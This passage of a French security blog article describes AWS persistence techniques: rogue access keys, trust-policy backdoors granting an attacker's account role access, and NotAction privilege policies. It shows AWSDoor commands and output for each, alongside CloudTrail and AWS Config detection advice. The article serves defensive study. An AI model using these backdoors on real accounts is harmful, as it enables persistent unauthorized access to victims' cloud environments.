</ul>
<p style="text-align: justify;"> </p>
<figure id="attachment_27297" aria-describedby="caption-attachment-27297" style="width: 1017px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27297" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_01-FR-Persitence-on-AWS.docx-Word-437x174.png" alt="Information d’une clé d’accès et de la dernière utilisation de celle-ci" width="1017" height="405" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_01-FR-Persitence-on-AWS.docx-Word-437x174.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_01-FR-Persitence-on-AWS.docx-Word-71x28.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_01-FR-Persitence-on-AWS.docx-Word-768x307.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_01-FR-Persitence-on-AWS.docx-Word-1536x613.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_01-FR-Persitence-on-AWS.docx-Word.png 1728w" sizes="auto, (max-width: 1017px) 100vw, 1017px" /><figcaption id="caption-attachment-27297" class="wp-caption-text"><em>Information d’une clé d’accès et de la dernière utilisation de celle-ci</em></figcaption></figure>



<p>&nbsp;</p>
<p style="text-align: justify;">Pour lister et supprimer une AccessKey, les privilèges suivants sont nécessaires :</p>
<ul style="text-align: justify;">
<li><strong> iam:ListAccessKeys</strong> : permet de récupérer les détails des AccessKey</li>
<li><strong> iam:UpdateAccessKey</strong> : permet de désactiver la clé avant sa suppression</li>
<li><strong> iam:DeleteAccessKey</strong> : permet de supprimer effectivement l’AccessKey</li>
</ul>
<p style="text-align: justify;">Il est possible d’enregistrer un dispositif MFA sur un utilisateur spécifique sans son consentement, ce qui permet de contourner la restriction. Cependant, si la connexion via AccessKey est refusée, cette technique ne peut pas être utilisée.</p>
<p style="text-align: justify;">Pour ajouter une AccessKey à un utilisateur, le privilège suivant est requis :</p>
<ul style="text-align: justify;">
<li> <strong>iam:CreateAccessKey</strong></li>
</ul>
<p style="text-align: justify;">Pour ajouter un dispositif MFA à un utilisateur, les privilèges suivants sont requis :</p>
<ul>
<li style="text-align: justify;"> <strong>aws:CreateVirtualMfaDevice</strong></li>
<li style="text-align: justify;"> <strong>aws:EnableMfaDevice</strong></li>
</ul>
<p>&nbsp;</p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p>Cette technique est implémentée dans AWSDoor :</p>
<p>&nbsp;</p>
<pre>python .\main.py -m AccessKey -u adele.vance<br><br>[+] Access key created for user: adele.vance<br>[+] Access key ID: AKIAWMFUPIEBGOX73NJY<br>[+] Access key Secret: p4g[…]i7ei</pre>
<p>&nbsp;</p>
<p>La <strong>clé est ensuite ajoutée à l’utilisateur</strong> :</p>
<p>&nbsp;</p>
<figure id="attachment_27300" aria-describedby="caption-attachment-27300" style="width: 999px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27300" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_35-FR-Persitence-on-AWS.docx-Word-437x175.png" alt="Clé ajoutée avec AWSDoor" width="999" height="400" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_35-FR-Persitence-on-AWS.docx-Word-437x175.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_35-FR-Persitence-on-AWS.docx-Word-71x28.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_35-FR-Persitence-on-AWS.docx-Word-768x307.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_35-FR-Persitence-on-AWS.docx-Word-1536x614.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_33_35-FR-Persitence-on-AWS.docx-Word-2048x819.png 2048w" sizes="auto, (max-width: 999px) 100vw, 999px" /><figcaption id="caption-attachment-27300" class="wp-caption-text"><em>Clé ajoutée avec AWSDoor</em></figcaption></figure>
<p>&nbsp;</p>
<h5><span style="text-decoration: underline;">Défense</span></h5>
<p style="text-align: justify;">Bien que l’ajout d’une <em>AccessKey</em> à un utilisateur <strong>soit le moyen le plus simple d’obtenir une persistance dans un environnement AWS</strong>, il s’agit également de l’une des méthodes <strong>les moins discrètes</strong>.</p>
<p style="text-align: justify;">En effet, si l’équipe de détection identifie la compromission de l’environnement, elle peut facilement retrouver l’AccessKey déployée par <strong>l’utilisateur compromis via les journaux AWS CloudTrail</strong> :</p>
<p style="text-align: justify;">&nbsp;</p>
<figure id="attachment_27303" aria-describedby="caption-attachment-27303" style="width: 951px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27303" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_00-FR-Persitence-on-AWS.docx-Word-264x191.png" alt="Journaux de création d’AccesKey " width="951" height="688" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_00-FR-Persitence-on-AWS.docx-Word-264x191.png 264w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_00-FR-Persitence-on-AWS.docx-Word-54x39.png 54w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_00-FR-Persitence-on-AWS.docx-Word-768x555.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_00-FR-Persitence-on-AWS.docx-Word.png 1505w" sizes="auto, (max-width: 951px) 100vw, 951px" /><figcaption id="caption-attachment-27303" class="wp-caption-text"><em>Journaux de création d’AccesKey</em></figcaption></figure>
<p>&nbsp;</p>



<p style="text-align: justify;">De plus, certaines solutions de sécurité<strong>, telles que les systèmes de gestion de posture de sécurité cloud (Cloud Security Posture Management), peuvent détecter ce type de persistan</strong>ce si les utilisateurs n’emploient généralement pas d’AccessKey.</p>
<p style="text-align: justify;">Enfin, à titre de recommandation, il est généralement préférable <strong>d’éviter l’utilisation d’utilisateurs IAM avec AccessKey et de privilégier l’utilisation d’AWS SSO</strong> :  <span style="color: #000080;"><a style="color: #000080;" href="https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-sso.html">https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-sso.html</a>.</span></p>
<p style="text-align: justify;">Une fois l’authentification SSO configurée, le nombre d’utilisateurs « humains » tombe à 0, seuls les utilisateurs de service restant. Il devient alors plus facile <strong>de repérer les AccessKey malveillantes et de surveiller de près celles existantes</strong> (par exemple, les utilisateurs de service CICD).</p>
<p style="text-align: justify;"> </p>
<h4 style="text-align: justify;">Trust Policy</h4>
<p style="text-align: justify;">Dans AWS, les rôles sont des objets IAM utilisés pour déléguer l’accès entre les services, les comptes ou les utilisateurs. Contrairement aux utilisateurs IAM, <strong>les rôles ne possèdent pas d’identifiants à long terme</strong>. <strong>Ils sont plutôt assumés (utilisés) via l’API sts:AssumeRole</strong>, qui renvoie des identifiants temporaires accordant les autorisations définies dans les politiques d’autorisations du rôle.</p>
<p style="text-align: justify;">Pour contrôler qui peut assumer un rôle, <strong>AWS utilise un document spécifique appelé Trust Policy</strong> (<em>Politique de confiance</em>). Une Trust Policy spécifie les identités de <strong>principaux de confiance</strong> (utilisateurs, rôles, comptes, services ou utilisateurs fédérés) <strong>autorisées à assumer le rôle</strong>. Si un principal n’est pas listé dans la politique de confiance d’un rôle, il ne peut tout simplement pas l’assumer, quelles que soient les autorisations qu’il détient ailleurs.</p>
<p style="text-align: justify;"> </p>
<h5><span style="text-decoration: underline;">Exemple de cas d’utilisation pour AssumeRole et la Trust Policy</span></h5>
<p style="text-align: justify;">Imaginez une entreprise disposant de plusieurs comptes AWS :</p>
<ul style="text-align: justify;">
<li>un pour le développement</li>
<li>un pour la préproduction (<em>staging</em>)</li>
<li>un pour la production</li>
</ul>
<p style="text-align: justify;">Plutôt que de créer et gérer des utilisateurs IAM distincts dans chaque environnement, <strong>l’organisation définit un groupe centralisé d’administrateurs dans un compte de gestion</strong>.</p>
<p> </p>
<figure id="attachment_27306" aria-describedby="caption-attachment-27306" style="width: 854px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27306" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word-345x191.png" alt="Assumer un rôle au travers de la TrustPolicy" width="854" height="473" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word-345x191.png 345w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word-768x425.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word-1536x849.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word-1170x650.png 1170w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_22-FR-Persitence-on-AWS.docx-Word.png 1763w" sizes="auto, (max-width: 854px) 100vw, 854px" /><figcaption id="caption-attachment-27306" class="wp-caption-text"><em>Assumer un rôle au travers de la TrustPolicy</em></figcaption></figure>
<p> </p>



<p style="text-align: justify;">Chaque compte cible <strong>définit un rôle avec des privilèges élevés</strong> (par exemple, CrossAdminAccess) et configure une TrustPolicy <strong>n’autorisant que les identités IAM du compte de gestion à l’assumer</strong>. La TrustPolicy, déployée sur chaque compte cible, ressemblera à ceci :</p>
<p>&nbsp;</p>
<pre>{<br>&nbsp; "Version": "2012-10-17",<br>&nbsp; "Statement": [<br>&nbsp;&nbsp;&nbsp; {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Effect": "Allow",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Principal": {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "AWS": "arn:aws:iam::${MgmtAccountId}:user/ADM01"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Action": "sts:AssumeRole",<br>&nbsp;&nbsp;&nbsp; }<br>&nbsp; ]<br>}</pre>
<p>&nbsp;</p>
<p style="text-align: justify;">Cette approche permet de <strong>maintenir une séparation claire entre les environnements tout en conservant un contrôle centralisé</strong>. Les administrateurs « changent de rôle » depuis le compte de gestion vers les autres comptes uniquement lorsque cela est nécessaire, sans dupliquer les identifiants. Après l’action AssumeRole, l’administrateur du compte de gestion obtient des privilèges d’administration temporaires sur le compte ciblé.</p>
<p>&nbsp;</p>
<h5><span style="text-decoration: underline;">Attaque</span></h5>
<p style="text-align: justify;">Comme indiqué dans la TrustPolicy précédente, la capacité à assumer un rôle spécifique dans un compte est <strong>gérée par la politique qui autorise explicitement un compte externe</strong> à assumer un rôle dans le compte cible.</p>
<p style="text-align: justify;">Cependant, <strong>rien n’impose à la TrustPolicy de n’autoriser que des comptes connus et de confiance</strong>. Un attaquant disposant des privilèges nécessaires pour modifier une TrustPolicy peut y introduire une porte dérobée en autorisant son propre compte AWS à assumer le rôle dans le compte compromis&nbsp;:</p>
<p>&nbsp;</p>
<pre>{<br>&nbsp; "Version": "2012-10-17",<br>&nbsp; "Statement": [<br>&nbsp;&nbsp;&nbsp; {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Effect": "Allow",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Principal": {<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;"AWS": [<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;"arn:aws:iam::${attackerAccountId}:role/fakeRole"<br>&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Action": "sts:AssumeRole"<br>&nbsp;&nbsp;&nbsp; }<br>&nbsp; ]<br>}</pre>
<p>&nbsp;</p>
<p style="text-align: justify;">Une fois cette politique appliquée, <strong>il est possible d’assumer directement le rôle compromis depuis l’extérieur</strong>.</p>
<p>&nbsp;</p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p>Cette technique est implémentée dans AWSDoor :</p>
<p>&nbsp;</p>
<pre>python .\main.py -m TrustPolicy -a FAKEROLE -r arn:aws:iam::584739118107:role/FakeRoleImitatingTargetRoleNames<br>[-] Initial trust policy:<br>{<br>&nbsp; "Version": "2012-10-17",<br>&nbsp; "Statement": [<br>&nbsp;&nbsp;&nbsp; {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Sid": "Statement1",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Effect": "Allow",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Principal": {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "AWS": "arn:aws:iam::438465151234:root"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Action": "sts:AssumeRole"<br>&nbsp;&nbsp;&nbsp; }<br>&nbsp; ]<br>}<br>[+] New trust policy:<br>{<br>&nbsp; "Version": "2012-10-17",<br>&nbsp; "Statement": [<br>&nbsp;&nbsp;&nbsp; {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Sid": "Statement1",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Effect": "Allow",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Principal": {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "AWS": [<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "arn:aws:iam::438465151234:user/ADM01",<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "arn:aws:iam::584739118107:role/FakeRoleimitatingTargetRoleNames"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Action": "sts:AssumeRole"<br>&nbsp;&nbsp;&nbsp; }<br>&nbsp; ]<br>}<br>[+] Do you want to apply this change? (yes/no): yes<br>[+] Trust policy for FAKEROLE updated<br><br> </pre>



<figure id="attachment_27308" aria-describedby="caption-attachment-27308" style="width: 886px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27308" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_45-FR-Persitence-on-AWS.docx-Word-437x179.png" alt="La TrustPolicy a été modifée par AWSDoor" width="886" height="363" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_45-FR-Persitence-on-AWS.docx-Word-437x179.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_45-FR-Persitence-on-AWS.docx-Word-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_45-FR-Persitence-on-AWS.docx-Word-768x314.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_45-FR-Persitence-on-AWS.docx-Word-1536x629.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_34_45-FR-Persitence-on-AWS.docx-Word.png 1774w" sizes="auto, (max-width: 886px) 100vw, 886px" /><figcaption id="caption-attachment-27308" class="wp-caption-text"><em>La TrustPolicy a été modifée par AWSDoor</em></figcaption></figure>
<p style="text-align: center;">&nbsp;</p>



<p style="text-align: justify;">L’outil permet de :</p>
<ul style="text-align: justify;">
<li><strong>Cibler une instruction spécifique avec l’argument -s</strong> : par défaut, l’outil injectera la politique de confiance dans la première instruction <strong>Allow</strong> qu’il trouve. S’il y a plusieurs instructions dans la politique, il est possible d’utiliser le paramètre -s pour cibler une instruction précise.</li>
<li><strong>Créer une nouvelle instruction avec l’argument -c </strong>: avec cette option, il est possible de forcer la création d’une nouvelle instruction avec un nom spécifique (<strong>MALICIOUS</strong> dans l’exemple ci-dessous).</li>
</ul>
<p style="text-align: justify;"> </p>
<figure id="attachment_27310" aria-describedby="caption-attachment-27310" style="width: 996px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27310" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_01-FR-Persitence-on-AWS.docx-Word-286x191.png" alt="Création d’une nouvelle instruction" width="996" height="665" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_01-FR-Persitence-on-AWS.docx-Word-286x191.png 286w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_01-FR-Persitence-on-AWS.docx-Word-58x39.png 58w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_01-FR-Persitence-on-AWS.docx-Word-768x513.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_01-FR-Persitence-on-AWS.docx-Word.png 1478w" sizes="auto, (max-width: 996px) 100vw, 996px" /><figcaption id="caption-attachment-27310" class="wp-caption-text"><em>Création d’une nouvelle instruction</em></figcaption></figure>
<p> </p>
<h5><span style="text-decoration: underline;">Défense</span></h5>
<p style="text-align: justify;">Ce type de persistance constitue <strong>un mécanisme de persistance puissant dans les environnements AWS</strong>. Cette technique <strong>ne nécessite pas de stocker des identifiants dans l’environnement victime</strong>, ce qui la rend très discrète et durable, d’autant plus que l’équipe de détection se concentre généralement uniquement sur les clés d’accès ou l’utilisation locale des rôles.</p>
<p style="text-align: justify;">La détection de <strong>cette méthode de persistance exige une surveillance attentive des modifications apportées aux politiques de confiance</strong>. AWS CloudTrail enregistre des événements tels que UpdateAssumeRolePolicy, qui peuvent révéler lorsqu’une politique de confiance est modifiée.</p>
<p> </p>
<figure id="attachment_27312" aria-describedby="caption-attachment-27312" style="width: 1013px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27312" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_17-FR-Persitence-on-AWS.docx-Word-437x176.png" alt="Exemple d'évènement UpdateAssumeRolePolicy" width="1013" height="408" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_17-FR-Persitence-on-AWS.docx-Word-437x176.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_17-FR-Persitence-on-AWS.docx-Word-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_17-FR-Persitence-on-AWS.docx-Word-768x310.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_17-FR-Persitence-on-AWS.docx-Word-1536x620.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_17-FR-Persitence-on-AWS.docx-Word.png 1944w" sizes="auto, (max-width: 1013px) 100vw, 1013px" /><figcaption id="caption-attachment-27312" class="wp-caption-text"><em>Exemple d&rsquo;évènement UpdateAssumeRolePolicy</em></figcaption></figure>
<p> </p>
<p style="text-align: justify;">De même, <strong>AWS Config peut être utilisé avec des règles personnalisées pour détecter les politiques de confiance (TrustPolicy) ciblant des comptes non gérés</strong>.</p>
<p> </p>
<h4>NotAllow</h4>
<h5><span style="text-decoration: underline;">Attaque</span></h5>
<p style="text-align: justify;">Une politique de rôle IAM (<em>IAM role policy</em>) est un document <em>JSON</em> <strong>attaché à un rôle IAM qui définit quelles actions le rôle est autorisé </strong>(ou interdit) d’effectuer, sur quelles ressources et dans quelles conditions.</p>
<p style="text-align: justify;">Par exemple, la politique suivante permet au rôle associé de lister tous les buckets S3 du compte :</p>
<p> </p>
<pre>{<br />  "Version": "2012-10-17",<br />  "Statement": [<br />    {<br />      "Effect": "Allow",<br />      "Action": "s3:ListBucket",<br />      "Resource": "*"<br />    }<br />  ]<br />}</pre>
<p> </p>
<p style="text-align: justify;">Dans la syntaxe des politiques, <strong>il est possible d’utiliser un opérateur de négation </strong>: au lieu de définir une liste blanche (<em>whitelist</em>) d’actions autorisées, il est possible de définir une liste noire (<em>blacklist) </em>d’actions.</p>
<p style="text-align: justify;">En effet, <strong>en utilisant l’opérateur NotAction, AWS appliquera l’effet de l’instruction à toutes les actions</strong>, sauf celles explicitement listées.</p>
<p style="text-align: justify;">Par exemple, la politique suivante :</p>
<p> </p>
<pre>{<br />  "Version": "2012-10-17",<br />  "Statement": [<br />    {<br />      "Effect": "Allow",<br />      "NotAction": "s3:ListBucket",<br />      "NotResource": "arn:aws:s3:::cloudtrails-logs-01032004"<br />    }<br />  ]<br />}</pre>
<p> </p>
<p style="text-align: justify;">Cette politique permettra au rôle <strong>d’exécuter toute action sauf l’action ListBucket sur le bucket S3 cloudtrails-logs-01032004 :</strong> elle accorde donc au rôle associé des privilèges maximaux sur le compte.</p>
<p style="text-align: justify;">Pour un défenseur, cette politique peut, à première vue, <strong>sembler inoffensive car elle cible une ressource S3 précise</strong>. En réalité, elle confère des privilèges équivalents à AdministratorAccess au rôle.</p>
<p style="text-align: justify;">Un attaquant peut ensuite <strong>installer une porte dérobée (backdoor) sur ce rôle en utilisant la persistance via la TrustPolicy</strong>, comme expliqué précédemment, afin d’obtenir un accès complet et à distance au compte AWS compromis.</p>
<p> </p>
<h5><span style="text-decoration: underline;">AWSDoor</span></h5>
<p>Cette technique est implémentée dans AWSDoor :</p>
<p> </p>
<pre>python .\main.py -m NotAction -r FAKEROLE -p ROGUEPOLICY<br />[+] The following policy will be added :<br />{<br />  "Version": "2012-10-17",<br />  "Statement": [<br />    {<br />      "Effect": "Allow",<br />      "NotAction": [<br />        "s3:ListBucket"<br />      ],<br />      "NotResource": "arn:aws:s3:::cloudtrails-logs-01032004"<br />    }<br />  ]<br />}<br /><br />[+] Do you want to apply this change? (yes/no): yes<br />[+] Created policy ARN: arn:aws:iam::438465151234:policy/ROGUEPOLICY<br />[+] Attaching the policy to FAKEROLE<br />[+] Successfully created policy ROGUEPOLICY and attached to FAKEROLE</pre>
<p> </p>
<p style="text-align: justify;">Pour la stratégie, il existe deux possibilités :</p>
<ul>
<li style="text-align: justify;"> <strong>Politique attachée :</strong> c’est la méthode la plus courante pour ajouter une stratégie à un rôle. Tout d’abord, une stratégie est créée avec l’instruction NotAction, puis la stratégie est attachée au rôle. La stratégie apparaîtra alors dans le panneau IAM/Policies :</li>
</ul>
<p> </p>
<figure id="attachment_27314" aria-describedby="caption-attachment-27314" style="width: 1004px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27314" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_37-FR-Persitence-on-AWS.docx-Word-437x131.png" alt="Politique de rôle attachée" width="1004" height="301" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_37-FR-Persitence-on-AWS.docx-Word-437x131.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_37-FR-Persitence-on-AWS.docx-Word-71x21.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_37-FR-Persitence-on-AWS.docx-Word-768x230.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_37-FR-Persitence-on-AWS.docx-Word.png 1374w" sizes="auto, (max-width: 1004px) 100vw, 1004px" /><figcaption id="caption-attachment-27314" class="wp-caption-text"><em>Politique de rôle attachée</em></figcaption></figure>
<p> </p>
<ul>
<li style="text-align: justify;"><strong>Stratégie inline (-i)</strong> : c’est la manière la plus rapide d’ajouter une stratégie à un rôle. La stratégie est créée directement au niveau du rôle (d’où le terme <em>inline</em>). Bien qu’il soit plus simple de créer ce type de stratégie, cela est généralement considéré comme une mauvaise pratique de configuration, car la stratégie n’apparaîtra pas dans le panneau IAM/Policies, ce qui la rend plus difficile à retrouver lors d’un examen de configuration.</li>
</ul>
<p style="text-align: justify;">Par conséquent, certains outils de conformité spécifiques peuvent signaler la stratégie inline. Non pas parce qu’elle est malveillante, mais parce qu’elle n’est pas conforme aux bonnes pratiques de sécurité.</p>
<p> </p>
<figure id="attachment_27316" aria-describedby="caption-attachment-27316" style="width: 1067px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-27316" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_51-FR-Persitence-on-AWS.docx-Word-437x186.png" alt="Une politique inline" width="1067" height="454" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_51-FR-Persitence-on-AWS.docx-Word-437x186.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_51-FR-Persitence-on-AWS.docx-Word-71x30.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_51-FR-Persitence-on-AWS.docx-Word-768x326.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_51-FR-Persitence-on-AWS.docx-Word-1536x653.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/2025-09-11-13_35_51-FR-Persitence-on-AWS.docx-Word.png 1562w" sizes="auto, (max-width: 1067px) 100vw, 1067px" /><figcaption id="caption-attachment-27316" class="wp-caption-text"><em>Une politique inline</em></figcaption></figure>
<p> </p>
<h5><span style="text-decoration: underline;">Défense</span></h5>
<p style="text-align: justify;">Du point de vue d’un défenseur, l<strong>’utilisation de NotAction combinée à l’effet Allow dans les stratégies IAM doit immédiatement susciter des soupçons</strong>, en particulier lorsqu’elle est associée à des champs NotResource.</p>
<p style="text-align: justify;">Les stratégies de détection et de mitigation suivantes peuvent aider les équipes de sécurité à se défendre contre ce type d’escalade de privilèges :</p>
<ul>
<li style="text-align: justify;"><strong> Surveiller les modifications des stratégies IAM</strong> via CloudTrail : toute création ou modification de stratégies IAM peut être suivie dans CloudTrail avec les événements suivants : CreatePolicy, PutRolePolicy, AttachRolePolicy, CreatePolicyVersion et SetDefaultPolicyVersion.</li>
<li style="text-align: justify;"><strong> Enquêter sur les documents de stratégie contenant le mot-clé NotAction </strong>: cela peut être automatisé en créant un scénario associé dans CloudWatch (NotAction dans requestParameters.policyDocument).</li>
<li style="text-align: justify;"><strong> Appliquer un contrôle de conformité avec AWS Config </strong>: une règle de configuration personnalisée peut être définie pour signaler toute stratégie incluant NotAction ou NotResource avec un effet Allow.</li>
</ul>
<p> </p>
<h3>Persistance basée sur les ressources</h3>
<p style="text-align: justify;">Dans AWS, <strong>il est courant d’attacher des rôles IAM à des ressources comme des fonctions Lambda, des instances EC2</strong> ou des tâches ECS. Cela permet à ces services d’accéder de manière sécurisée à d’autres ressources AWS, en fonction des autorisations définies dans le rôle. Par exemple, une instance EC2 peut utiliser un rôle pour lire des secrets dans Secrets Manager ou envoyer des journaux vers CloudWatch.</p>
<p style="text-align: justify;">Du point de vue d’un attaquant, <strong>cette configuration peut être utile pour maintenir une persistance</strong>. S’il parvient à compromettre une ressource disposant d’un rôle hautement privilégié, tel qu’un rôle avec AdministratorAccess, il peut utiliser ce rôle pour interagir avec AWS de la même manière que le ferait la ressource.</p>
<p style="text-align: justify;">Cela signifie que <strong>l’attaquant n’a pas besoin de créer de nouvelles informations d’identification ni de modifier directement IAM</strong>. Tant qu’il conserve l’accès à la ressource, il peut continuer à utiliser les autorisations du rôle, ce qui rend cette méthode à la fois efficace et plus difficile à détecter.</p>
<p> </p>
<h4>Lambda</h4>
<p style="text-align: justify;"><strong>Les fonctions AWS Lambda sont devenues un choix populaire pour exécuter du code</strong> dans le cloud sans avoir à gérer de serveurs. Elles permettent aux développeurs et aux organisations d’automatiser des tâches, de répondre à des événements et de créer des applications évolutives qui ne s’exécutent qu’en cas de besoin. Par exemple, Lambda peut traiter des fichiers téléchargés dans S3, gérer des requêtes API ou réagir automatiquement à des modifications dans une base de données.</p>
<p style="text-align: justify;">Par exemple, pour gérer les administrateurs de comptes, il est possible de créer <strong>une fonction Lambda qui ajoute des privilèges à un utilisateur lorsqu’il est ajouté à une base de données DynamoDB </strong>: la modification de DynamoDB déclenche le code Lambda, qui modifie alors les privilèges de l’utilisateur en fonction des changements dans la base de données.</p>
<p style="text-align: justify;">Par conséquent, <strong>il n’est pas habituel d’associer une identité IAM à une fonction Lambda.</strong></p>
<p> </p>
<h5><span style="text-decoration: underline;">Rôle sur-privilégié</span></h5>
<p style="text-align: justify;">Un moyen d’obtenir une persistance sur un compte AWS consiste soit à <strong>associer une identité IAM sur-privilégiée</strong> à une fonction Lambda existante, soit à modifier le code d’une fonction Lambda déjà sur-privilégiée.</p>
<p>Par exemple, un attaquant peut :</p>
<ul style="text-align: justify;">
<li> Créer une fonction Lambda</li>
<li> Associer un rôle IAM privilégié (en utilisant par exemple l’astuce NotAction)</li>
